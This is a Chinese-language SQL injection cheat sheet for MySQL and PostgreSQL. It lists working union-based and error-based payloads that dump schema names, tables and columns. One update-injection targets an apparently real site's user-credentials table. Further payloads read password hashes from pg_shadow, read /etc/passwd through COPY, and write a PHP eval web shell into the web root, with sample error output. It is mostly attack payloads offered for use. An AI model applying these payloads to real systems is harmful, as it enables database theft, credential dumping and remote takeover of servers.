/*列出所有有权限数据库*/ 100+union+select+1,group_concat(DISTINCT+table_schema) +from+information_schema.tables /*列出当前数据库下所有表*/ 100+union+select+1,group_concat(DISTINCT+table_name) +from+information_schema.tables+where+table_schema=database() /*列出admin表下所有字段,使用hex去引号*/ 100+union+select+1,group_concat(DISTINCT+column_name) +from+information_schema.columns+where+table_name='admin' /*错误回显*/ 100+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a,(select+user()+from+mysql.user))a+from+information_schema.tables+group+by+a)b+--+ /*update注入*/ settime.php?id=943126&expiretime=2016-06-26'or+updatexml(1,concat(0x3a,(select+salt+from+vanpeopl_ucenter.uc_members+where+uid=1+and+left(password,32)='d3c8ea6bbf7XXXXX905244699aX'+limit+0,1),0x3a),0)+--+
注入常用函数
| 函数 | 作用 | 用法 |
|---|---|---|
| count | 计合 | select count(*) from admin或select count(password) form admin |
| group_concat | 列数组数据 | select group_concat(password,'<br />') |
| DISTINCT | 去重 | group_concat(DISTINCT email) |
| length | 长度 | id=10+and+length(version())=10 |
| left | 读内容 | id=10+and+left(version(),6)='5.5.31' |
| datadir | 数据路径 | select @@datadir |
组合用法:
id=10+left((select+count(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),2)=24
select version(); union select 1,2,...n,version() //version()函数与MySQL的是一样的
回显数据举例:
PostgreSQL 8.1.18 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)
select aa from bb where cc=dd; union select 1,2,....n,aa from bb where cc=dd
所有的SQL语法几乎都是这样的语法来爆数据
select datname from pg_database; union select 1,2,....,n,datname from pg_database;
回显举例:postgres,prc,template1,template0
select relname from pg_stat_user_tables limit 1 offset n; //类似于MySQL中的information_schema.tables,虽然不大恰当 union select relname from pg_stat_user_tables limit 1 offset 3; //limit 1 offset 0和MySQL的limit 0,1一个效果。
无举例
select column_name from information_schema.columns where table_name='xxx' limit 1 offset n; union select 1,2,.....,n,column_name from information_schema.columns where table_name=0x3a limit 1 offset 5
同MySQL
读取数据库登陆账户和密码
select usename,passwd from pg_shadow; union select 1,2,...n,usename,passwd from pg_shadow
pg_shadow数据库类似于MySQL中的mysql数据库,root账户为postgres
回显举例:postgres 9d2e7638fd7c7e433f0074a8f65cfd3a
create table test(code text); copy test from '/etc /passwd'with delimiter E'\t';
注:网上多数关于Postgresql的语句中是双引号,实际测试,8.x到9.x双引号无效,应该用双引号)
回显举例:Query failed: ERROR: extra data after last expected column CONTEXT: COPY file, line 1: “root:x:0:0:root:/root:/bin/bash”
insert into test values ('<?php eval($_POST["cmd"];?>');
copy test(code) to ”/var/www/one.php”;
回显举例:Query failed: ERROR: could not open file “/var/www/html/aaa.php” for writing: Permission denied
pg_file_read()不如MySQL中的load_file()那么好用
例如:
select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));
回显:Query failed: ERROR: function pg_file_length(“unknown”) does not exist HINT: No function matches the given name and argument types. You may need to add explicit type casts.
x